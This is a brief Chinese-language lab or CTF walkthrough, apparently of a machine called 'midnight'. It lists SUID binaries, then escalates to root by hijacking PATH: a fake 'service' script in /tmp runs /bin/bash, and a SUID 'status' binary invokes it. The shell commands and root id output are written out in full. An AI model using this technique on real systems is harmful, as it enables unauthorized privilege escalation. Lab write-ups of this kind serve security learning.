查看SUID
/usr/bin/su
/usr/bin/sudo
/usr/bin/status
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
可以看到 /usr/bin/status 非系统常见
但是这个status让我们可以联想到经常使用的service命令
service ssh status 查看ssh工具状态
利用这个特性,我们创建service文件,使他调用我们的status
环境变量路径劫持
jose@midnight:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
jose@midnight:/tmp$ echo "/bin/bash" > service
jose@midnight:/tmp$ chmod 777 service
jose@midnight:/tmp$ export PATH=/tmp/:$PATH
jose@midnight:/tmp$ /usr/bin/status
root@midnight:/tmp# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
root@midnight:/tmp#